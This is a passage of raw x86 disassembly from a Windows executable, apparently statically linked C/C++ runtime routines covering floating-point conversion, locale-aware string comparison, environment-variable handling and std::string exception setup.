; sub_41FFC0+98�j ...
mov [ebp+var_10], eax
lea eax, [ebp+var_20]
mov [ebp+var_4], eax
mov [ebp+arg_4], 5
loc_420080: ; CODE XREF: sub_41FFC0+122�j
mov eax, [ebp+var_10]
add eax, eax
cmp [ebp+arg_4], 0
jle short loc_4200D4
add eax, esi
lea ecx, [ebx+8]
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], ecx
mov [ebp+var_18], eax
loc_42009C: ; CODE XREF: sub_41FFC0+112�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
movzx eax, word ptr [eax]
movzx ecx, word ptr [ecx]
imul eax, ecx
mov ecx, [ebp+var_4]
add ecx, 0FFFFFFFCh
push ecx
push eax
push dword ptr [ecx]
call sub_41F456
add esp, 0Ch
test eax, eax
jz short loc_4200C7
mov eax, [ebp+var_4]
inc word ptr [eax]
loc_4200C7: ; CODE XREF: sub_41FFC0+FF�j
add [ebp+var_8], 2
sub [ebp+var_C], 2
dec [ebp+var_18]
jnz short loc_42009C
loc_4200D4: ; CODE XREF: sub_41FFC0+C9�j
add [ebp+var_4], 2
inc [ebp+var_10]
dec [ebp+arg_4]
cmp [ebp+arg_4], 0
jg short loc_420080
add [ebp+arg_0], 0C002h
cmp word ptr [ebp+arg_0], 0
jle short loc_420117
loc_4200F2: ; CODE XREF: sub_41FFC0+14E�j
test byte ptr [ebp+var_1C+3], 80h
jnz short loc_420110
lea eax, [ebp+var_24]
push eax
call sub_41F4D5
add [ebp+arg_0], 0FFFFh
pop ecx
cmp word ptr [ebp+arg_0], 0
jg short loc_4200F2
loc_420110: ; CODE XREF: sub_41FFC0+136�j
cmp word ptr [ebp+arg_0], 0
jg short loc_420150
loc_420117: ; CODE XREF: sub_41FFC0+130�j
add [ebp+arg_0], 0FFFFh
cmp word ptr [ebp+arg_0], 0
jge short loc_420150
movsx eax, word ptr [ebp+arg_0]
neg eax
add [ebp+arg_0], eax
mov ebx, eax
loc_420130: ; CODE XREF: sub_41FFC0+184�j
test byte ptr [ebp+var_24], 1
jz short loc_420139
inc [ebp+var_14]
loc_420139: ; CODE XREF: sub_41FFC0+174�j
lea eax, [ebp+var_24]
push eax
call sub_41F503
dec ebx
pop ecx
jnz short loc_420130
cmp [ebp+var_14], 0
jz short loc_420150
or byte ptr [ebp+var_24], 1
loc_420150: ; CODE XREF: sub_41FFC0+155�j
; sub_41FFC0+163�j ...
cmp word ptr [ebp+var_24], 8000h
ja short loc_420167
mov eax, [ebp+var_24]
and eax, 1FFFFh
cmp eax, 18000h
jnz short loc_42019C
loc_420167: ; CODE XREF: sub_41FFC0+196�j
cmp [ebp+var_24+2], 0FFFFFFFFh
jnz short loc_420199
and [ebp+var_24+2], 0
cmp [ebp+var_20+2], 0FFFFFFFFh
jnz short loc_420194
and [ebp+var_20+2], 0
cmp word ptr [ebp+var_1C+2], 0FFFFh
jnz short loc_42018E
inc [ebp+arg_0]
mov word ptr [ebp+var_1C+2], 8000h
jmp short loc_42019C
; ---------------------------------------------------------------------------
loc_42018E: ; CODE XREF: sub_41FFC0+1C1�j
inc word ptr [ebp+var_1C+2]
jmp short loc_42019C
; ---------------------------------------------------------------------------
loc_420194: ; CODE XREF: sub_41FFC0+1B5�j
inc [ebp+var_20+2]
jmp short loc_42019C
; ---------------------------------------------------------------------------
loc_420199: ; CODE XREF: sub_41FFC0+1AB�j
inc [ebp+var_24+2]
loc_42019C: ; CODE XREF: sub_41FFC0+1A5�j
; sub_41FFC0+1CC�j ...
mov eax, [ebp+arg_0]
cmp ax, 7FFFh
jnb short loc_4201C0
mov cx, word ptr [ebp+var_24+2]
or eax, edi
mov [esi], cx
mov ecx, [ebp+var_20]
mov [esi+2], ecx
mov ecx, [ebp+var_1C]
mov [esi+6], ecx
loc_4201BA: ; CODE XREF: sub_41FFC0+86�j
mov [esi+0Ah], ax
jmp short loc_4201DB
; ---------------------------------------------------------------------------
loc_4201C0: ; CODE XREF: sub_41FFC0+42�j
; sub_41FFC0+4D�j ...
neg di
sbb edi, edi
and dword ptr [esi+4], 0
and edi, 80000000h
add edi, 7FFF8000h
and dword ptr [esi], 0
mov [esi+8], edi
loc_4201DB: ; CODE XREF: sub_41FFC0+AB�j
; sub_41FFC0+1FE�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FFC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4201E0 proc near ; CODE XREF: sub_41F5F7+440�p
; sub_41FAC8+14C�p
var_C = byte ptr -0Ch
var_A = dword ptr -0Ah
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, offset dword_431E50
xor ecx, ecx
sub ebx, 60h
cmp [ebp+arg_4], ecx
jz short loc_420259
jge short loc_420208
mov eax, [ebp+arg_4]
mov ebx, offset dword_431FB0
neg eax
mov [ebp+arg_4], eax
sub ebx, 60h
loc_420208: ; CODE XREF: sub_4201E0+16�j
cmp [ebp+arg_8], ecx
jnz short loc_420213
mov eax, [ebp+arg_0]
mov [eax], cx
loc_420213: ; CODE XREF: sub_4201E0+2B�j
cmp [ebp+arg_4], ecx
jz short loc_420259
push esi
push edi
loc_42021A: ; CODE XREF: sub_4201E0+75�j
mov eax, [ebp+arg_4]
add ebx, 54h
sar [ebp+arg_4], 3
and eax, 7
cmp eax, ecx
jz short loc_420252
lea eax, [eax+eax*2]
cmp word ptr [ebx+eax*4], 8000h
lea esi, [ebx+eax*4]
jb short loc_420245
lea edi, [ebp+var_C]
movsd
movsd
movsd
dec [ebp+var_A]
lea esi, [ebp+var_C]
loc_420245: ; CODE XREF: sub_4201E0+57�j
push esi
push [ebp+arg_0]
call sub_41FFC0
pop ecx
pop ecx
xor ecx, ecx
loc_420252: ; CODE XREF: sub_4201E0+49�j
cmp [ebp+arg_4], ecx
jnz short loc_42021A
pop edi
pop esi
loc_420259: ; CODE XREF: sub_4201E0+14�j
; sub_4201E0+36�j
pop ebx
leave
retn
sub_4201E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42025C proc near ; CODE XREF: sub_41FECD+5E�p
; sub_420738+18�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 0
jnz short loc_420269
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420269: ; CODE XREF: sub_42025C+7�j
push ds:dword_4CA4C4
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_8]
push [ebp+arg_0]
push 1
push ds:dword_4CA6E4
call sub_420309
add esp, 1Ch
test eax, eax
jnz short loc_420296
mov eax, 7FFFFFFFh
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420296: ; CODE XREF: sub_42025C+31�j
add eax, 0FFFFFFFEh
pop ebp
retn
sub_42025C endp
; =============== S U B R O U T I N E =======================================
sub_42029B proc near ; CODE XREF: sub_41FECD+1E�p
; sub_4205B1+5B�p
var_4 = dword ptr -4
push ecx
push ebx
push ebp
push esi
mov esi, ds:dword_4C90B4
push edi
xor edi, edi
mov eax, [esi]
cmp eax, edi
jz short loc_4202FC
mov ebx, ds:dword_422130
loc_4202B4: ; CODE XREF: sub_42029B+5F�j
push edi
push edi
push edi
push edi
push 0FFFFFFFFh
push eax
push edi
push 1
call ebx ; WideCharToMultiByte
mov ebp, eax
cmp ebp, edi
jz short loc_420304
push ebp
call sub_415D2F
cmp eax, edi
pop ecx
mov [esp+14h+var_4], eax
jz short loc_420304
push edi
push edi
push ebp
push eax
push 0FFFFFFFFh
push dword ptr [esi]
push edi
push 1
call ebx ; WideCharToMultiByte
test eax, eax
jz short loc_420304
push edi
push [esp+18h+var_4]
call sub_4205B1
mov eax, [esi+4]
add esi, 4
pop ecx
cmp eax, edi
pop ecx
jnz short loc_4202B4
loc_4202FC: ; CODE XREF: sub_42029B+11�j
xor eax, eax
loc_4202FE: ; CODE XREF: sub_42029B+6C�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_420304: ; CODE XREF: sub_42029B+29�j
; sub_42029B+38�j ...
or eax, 0FFFFFFFFh
jmp short loc_4202FE
sub_42029B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420309 proc near ; CODE XREF: sub_42025C+27�p
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_422C70
push offset sub_41D894
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
cmp ds:dword_4C9370, ebx
push 1
pop edi
jnz short loc_42037C
push edi
mov eax, offset dword_4228C0
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_422008 ; CompareStringW
test eax, eax
jz short loc_420359
mov ds:dword_4C9370, edi
jmp short loc_42037C
; ---------------------------------------------------------------------------
loc_420359: ; CODE XREF: sub_420309+46�j
push edi
mov eax, offset dword_4325D4
push eax
push edi
push eax
push ebx
push ebx
call ds:dword_42200C ; CompareStringA
test eax, eax
jz loc_420572
mov ds:dword_4C9370, 2
loc_42037C: ; CODE XREF: sub_420309+31�j
; sub_420309+4E�j
mov esi, [ebp+arg_C]
cmp esi, ebx
jle short loc_420393
push esi
push [ebp+arg_8]
call sub_420586
pop ecx
pop ecx
mov esi, eax
mov [ebp+arg_C], esi
loc_420393: ; CODE XREF: sub_420309+78�j
cmp [ebp+arg_14], ebx
jle short loc_4203A8
push [ebp+arg_14]
push [ebp+arg_10]
call sub_420586
pop ecx
pop ecx
mov [ebp+arg_14], eax
loc_4203A8: ; CODE XREF: sub_420309+8D�j
mov eax, ds:dword_4C9370
cmp eax, 2
jnz short loc_4203CD
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42200C ; CompareStringA
jmp loc_420574
; ---------------------------------------------------------------------------
loc_4203CD: ; CODE XREF: sub_420309+A7�j
cmp eax, edi
jnz loc_420572
cmp [ebp+arg_18], ebx
jnz short loc_4203E2
mov eax, ds:dword_4C912C
mov [ebp+arg_18], eax
loc_4203E2: ; CODE XREF: sub_420309+CF�j
cmp esi, ebx
jz short loc_4203EF
cmp [ebp+arg_14], ebx
jnz loc_420487
loc_4203EF: ; CODE XREF: sub_420309+DB�j
cmp esi, [ebp+arg_14]
jnz short loc_4203FC
loc_4203F4: ; CODE XREF: sub_420309+13C�j
; sub_420309+16D�j
push 2
loc_4203F6: ; CODE XREF: sub_420309+146�j
pop eax
jmp loc_420574
; ---------------------------------------------------------------------------
loc_4203FC: ; CODE XREF: sub_420309+E9�j
cmp [ebp+arg_14], edi
jle short loc_420408
loc_420401: ; CODE XREF: sub_420309+151�j
; sub_420309+159�j ...
mov eax, edi
jmp loc_420574
; ---------------------------------------------------------------------------
loc_420408: ; CODE XREF: sub_420309+F6�j
cmp esi, edi
jg short loc_42044D
lea eax, [ebp+var_3C]
push eax
push [ebp+arg_18]
call ds:dword_4221B4 ; GetCPInfo
test eax, eax
jz loc_420572
cmp esi, ebx
jle short loc_420451
cmp [ebp+var_3C], 2
jb short loc_42044D
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_42044D
loc_420433: ; CODE XREF: sub_420309+142�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_42044D
mov ecx, [ebp+arg_8]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_420447
cmp cl, dl
jbe short loc_4203F4
loc_420447: ; CODE XREF: sub_420309+138�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_420433
loc_42044D: ; CODE XREF: sub_420309+101�j
; sub_420309+120�j ...
push 3
jmp short loc_4203F6
; ---------------------------------------------------------------------------
loc_420451: ; CODE XREF: sub_420309+11A�j
cmp [ebp+arg_14], ebx
jle short loc_420487
cmp [ebp+var_3C], 2
jb short loc_420401
lea eax, [ebp+var_36]
cmp [ebp+var_36], bl
jz short loc_420401
loc_420464: ; CODE XREF: sub_420309+177�j
mov dl, [eax+1]
cmp dl, bl
jz short loc_420401
mov ecx, [ebp+arg_10]
mov cl, [ecx]
cmp cl, [eax]
jb short loc_42047C
cmp cl, dl
jbe loc_4203F4
loc_42047C: ; CODE XREF: sub_420309+169�j
inc eax
inc eax
cmp [eax], bl
jnz short loc_420464
jmp loc_420401
; ---------------------------------------------------------------------------
loc_420487: ; CODE XREF: sub_420309+E0�j
; sub_420309+14B�j
push ebx
push ebx
push esi
push [ebp+arg_8]
push 9
push [ebp+arg_18]
call ds:dword_422134 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp eax, ebx
jz loc_420572
mov [ebp+var_4], ebx
add eax, eax
add eax, 3
and al, 0FCh
call sub_415D00
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_4204D6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
mov [ebp+var_24], ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+arg_C]
push 1
pop edi
loc_4204D6: ; CODE XREF: sub_420309+1B5�j
cmp [ebp+var_24], ebx
jz loc_420572
push [ebp+var_1C]
push [ebp+var_24]
push esi
push [ebp+arg_8]
push edi
push [ebp+arg_18]
mov esi, ds:dword_422134
call esi ; MultiByteToWideChar
test eax, eax
jz short loc_420572
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_420572
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_415D00
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_420541
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_420541: ; CODE XREF: sub_420309+224�j
cmp edi, ebx
jz short loc_420572
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call ds:dword_422134 ; MultiByteToWideChar
test eax, eax
jz short loc_420572
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_422008 ; CompareStringW
jmp short loc_420574
; ---------------------------------------------------------------------------
loc_420572: ; CODE XREF: sub_420309+63�j
; sub_420309+C6�j ...
xor eax, eax
loc_420574: ; CODE XREF: sub_420309+BF�j
; sub_420309+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_420309 endp
; =============== S U B R O U T I N E =======================================
sub_420586 proc near ; CODE XREF: sub_41C829+81�p
; sub_420309+7E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_4205A3
loc_420596: ; CODE XREF: sub_420586+1B�j
cmp byte ptr [eax], 0
jz short loc_4205A3
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_420596
loc_4205A3: ; CODE XREF: sub_420586+E�j
; sub_420586+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_4205AE
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4205AE: ; CODE XREF: sub_420586+21�j
mov eax, edx
retn
sub_420586 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4205B1 proc near ; CODE XREF: sub_42029B+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_420615
push 3Dh
push [ebp+arg_0]
call sub_4207F7
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_420615
cmp [ebp+arg_0], esi
jz short loc_420615
mov eax, ds:dword_4C90AC
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, ds:dword_4C90B0
jnz short loc_4205FB
push eax
call sub_420790
pop ecx
mov ds:dword_4C90AC, eax
loc_4205FB: ; CODE XREF: sub_4205B1+3C�j
cmp eax, edi
jnz short loc_420653
cmp [ebp+arg_4], edi
jz short loc_42061D
cmp ds:dword_4C90B4, edi
jz short loc_42061D
call sub_42029B
test eax, eax
jz short loc_420653
loc_420615: ; CODE XREF: sub_4205B1+D�j
; sub_4205B1+22�j ...
or eax, 0FFFFFFFFh
loc_420618: ; CODE XREF: sub_4205B1+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42061D: ; CODE XREF: sub_4205B1+51�j
; sub_4205B1+59�j
cmp ebx, edi
jnz loc_420731
push 4
call sub_415D2F
cmp eax, edi
pop ecx
mov ds:dword_4C90AC, eax
jz short loc_420615
mov [eax], edi
cmp ds:dword_4C90B4, edi
jnz short loc_420653
push 4
call sub_415D2F
cmp eax, edi
pop ecx
mov ds:dword_4C90B4, eax
jz short loc_420615
mov [eax], edi
loc_420653: ; CODE XREF: sub_4205B1+4C�j
; sub_4205B1+62�j ...
sub esi, [ebp+arg_0]
mov edi, ds:dword_4C90AC
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_420738
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_4206B3
cmp dword ptr [edi], 0
jz short loc_4206B3
test ebx, ebx
jz short loc_4206AB
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_415DE1
pop ecx
loc_420685: ; CODE XREF: sub_4205B1+E2�j
cmp dword ptr [edi], 0
jz short loc_420695
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_420685
; ---------------------------------------------------------------------------
loc_420695: ; CODE XREF: sub_4205B1+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_41756F
pop ecx
test eax, eax
pop ecx
jz short loc_4206E5
jmp short loc_4206E0
; ---------------------------------------------------------------------------
loc_4206AB: ; CODE XREF: sub_4205B1+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_4206E5
; ---------------------------------------------------------------------------
loc_4206B3: ; CODE XREF: sub_4205B1+BD�j
; sub_4205B1+C2�j
test ebx, ebx
jnz short loc_420731
test esi, esi
jge short loc_4206BD
neg esi
loc_4206BD: ; CODE XREF: sub_4205B1+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_41756F
pop ecx
test eax, eax
pop ecx
jz loc_420615
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_4206E0: ; CODE XREF: sub_4205B1+F8�j
mov ds:dword_4C90AC, eax
loc_4206E5: ; CODE XREF: sub_4205B1+F6�j
; sub_4205B1+100�j
cmp [ebp+arg_4], 0
jz short loc_420731
push [ebp+arg_0]
call sub_415C80
inc eax
inc eax
push eax
call sub_415D2F
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_420731
push [ebp+arg_0]
push esi
call sub_415B90
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call ds:dword_422004 ; SetEnvironmentVariableA
push esi
call sub_415DE1
pop ecx
loc_420731: ; CODE XREF: sub_4205B1+6E�j
; sub_4205B1+104�j ...
xor eax, eax
jmp loc_420618
sub_4205B1 endp
; =============== S U B R O U T I N E =======================================
sub_420738 proc near ; CODE XREF: sub_4205B1+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ds:dword_4C90AC
push edi
mov eax, [esi]
test eax, eax
jz short loc_420773
mov edi, [esp+8+arg_4]
loc_42074A: ; CODE XREF: sub_420738+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_42025C
add esp, 0Ch
test eax, eax
jnz short loc_420769
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_420783
test al, al
jz short loc_420783
loc_420769: ; CODE XREF: sub_420738+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_42074A
loc_420773: ; CODE XREF: sub_420738+C�j
mov eax, esi
sub eax, ds:dword_4C90AC
sar eax, 2
neg eax
loc_420780: ; CODE XREF: sub_420738+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_420783: ; CODE XREF: sub_420738+2B�j
; sub_420738+2F�j
mov eax, esi
sub eax, ds:dword_4C90AC
sar eax, 2
jmp short loc_420780
sub_420738 endp
; =============== S U B R O U T I N E =======================================
sub_420790 proc near ; CODE XREF: sub_4205B1+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_42079F
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_42079F: ; CODE XREF: sub_420790+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_4207B1
loc_4207A7: ; CODE XREF: sub_420790+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_4207A7
loc_4207B1: ; CODE XREF: sub_420790+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_415D2F
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_4207D2
push 9
call sub_417DFA
pop ecx
loc_4207D2: ; CODE XREF: sub_420790+38�j
mov eax, [edi]
mov ebx, edi
loc_4207D6: ; CODE XREF: sub_420790+5B�j
test eax, eax
jz short loc_4207ED
push eax
add ebx, 4
call sub_42086A
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_4207D6
; ---------------------------------------------------------------------------
loc_4207ED: ; CODE XREF: sub_420790+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_420790 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4207F7 proc near ; CODE XREF: sub_4205B1+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp ds:dword_4CA4DC, 0
jnz short loc_420812
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417070
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420812: ; CODE XREF: sub_4207F7+A�j
mov ecx, [ebp+arg_0]
loc_420815: ; CODE XREF: sub_4207F7+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_420858
movzx edx, al
test ds:byte_4CA5E1[edx], 4
jz short loc_420844
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_42084F
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_420853
jmp short loc_42084C
; ---------------------------------------------------------------------------
loc_420844: ; CODE XREF: sub_4207F7+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_420858
loc_42084C: ; CODE XREF: sub_4207F7+4B�j
inc ecx
jmp short loc_420815
; ---------------------------------------------------------------------------
loc_42084F: ; CODE XREF: sub_4207F7+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420853: ; CODE XREF: sub_4207F7+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_420858: ; CODE XREF: sub_4207F7+25�j
; sub_4207F7+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_4207F7 endp
; =============== S U B R O U T I N E =======================================
sub_42086A proc near ; CODE XREF: sub_408E1D+21�p
; sub_420790+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_420891
push esi
call sub_415C80
inc eax
push eax
call sub_415D2F
pop ecx
test eax, eax
pop ecx
jz short loc_420891
push esi
push eax
call sub_415B90
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_420891: ; CODE XREF: sub_42086A+7�j
; sub_42086A+1A�j
xor eax, eax
pop esi
retn
sub_42086A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4208A0 proc near ; CODE XREF: sub_420983+19�p
; sub_420AAA+19�p
arg_0 = dword ptr 4
push esi
push [esp+4+arg_0]
mov esi, ecx
xor eax, eax
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_415C80
pop ecx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_403870
mov eax, esi
pop esi
retn 8
sub_4208A0 endp
; =============== S U B R O U T I N E =======================================
sub_4208CA proc near ; CODE XREF: _0:004208F5�p
; sub_420978+6�j ...
push esi
mov esi, ecx
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_422C8C
call sub_403834
mov ecx, esi
pop esi
jmp sub_420CC0
sub_4208CA endp
; =============== S U B R O U T I N E =======================================
sub_4208E5 proc near ; DATA XREF: _1:00422C90�o _1:00422CA0�o ...
mov eax, [ecx+10h]
test eax, eax
jnz short locret_4208F1
mov eax, offset dword_422278
locret_4208F1: ; CODE XREF: sub_4208E5+5�j
retn
sub_4208E5 endp
; ---------------------------------------------------------------------------
loc_4208F2: ; DATA XREF: _1:off_422C8C�o
push esi
mov esi, ecx
call sub_4208CA
test byte ptr [esp+8], 1
jz short loc_420908
push esi
call sub_416457
pop ecx
loc_420908: ; CODE XREF: _0:004208FF�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_42090E proc near ; CODE XREF: sub_420983+29�p
mov eax, offset loc_42123E
call sub_416438
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_422CA8
call sub_420C39
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_422C8C
call sub_4209C0
mov ecx, [ebp-0Ch]
mov dword ptr [esi], offset off_422C9C
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_42090E endp
; =============== S U B R O U T I N E =======================================
sub_42095C proc near ; DATA XREF: _1:off_422C9C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_420978
test [esp+4+arg_0], 1
jz short loc_420972
push esi
call sub_416457
pop ecx
loc_420972: ; CODE XREF: sub_42095C+D�j
mov eax, esi
pop esi
retn 4
sub_42095C endp
; =============== S U B R O U T I N E =======================================
sub_420978 proc near ; CODE XREF: sub_42095C+3�p
; DATA XREF: _1:00423014�o
mov dword ptr [ecx], offset off_422C9C
jmp sub_4208CA
sub_420978 endp
; =============== S U B R O U T I N E =======================================
sub_420983 proc near ; CODE XREF: sub_4036E1+13�p
; sub_4038A5+E�p
mov eax, offset loc_421250
call sub_416438
sub esp, 30h
lea eax, [ebp-0Dh]
push eax
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-20h]
call sub_4208A0
and dword ptr [ebp-4], 0
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-3Ch]
call sub_42090E
push offset dword_423010
lea eax, [ebp-3Ch]
push eax
call sub_420CE3
int 3 ; Trap to Debugger
sub_420983 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4209C0 proc near ; CODE XREF: sub_42090E+32�p
; sub_4209E0+32�p ...
arg_0 = dword ptr 4
push esi
xor eax, eax
push 0FFFFFFFFh
mov esi, ecx
push eax
push [esp+0Ch+arg_0]
mov [esi+4], eax
mov [esi+8], eax
mov [esi+0Ch], eax
call sub_4036E1
mov eax, esi
pop esi
retn 4
sub_4209C0 endp
; =============== S U B R O U T I N E =======================================
sub_4209E0 proc near ; CODE XREF: sub_420AAA+29�p
mov eax, offset loc_421262
call sub_416438
push ecx
push ecx
push esi
lea eax, [ebp-10h]
mov esi, ecx
push eax
mov [ebp-14h], esi
mov dword ptr [ebp-10h], offset dword_422CA8
call sub_420C39
push dword ptr [ebp+8]
and dword ptr [ebp-4], 0
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_422C8C
call sub_4209C0
mov ecx, [ebp-0Ch]
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4209E0 endp
; =============== S U B R O U T I N E =======================================
sub_420A28 proc near ; CODE XREF: sub_420A92+7�p
; sub_420AEE+7�p ...
mov eax, offset loc_421274
call sub_416438
push ecx
push esi
push edi
mov edi, [ebp+8]
mov esi, ecx
push edi
mov [ebp-10h], esi
call sub_420C76
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_422C8C
call sub_4209C0
mov ecx, [ebp-0Ch]
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
leave
retn 4
sub_420A28 endp
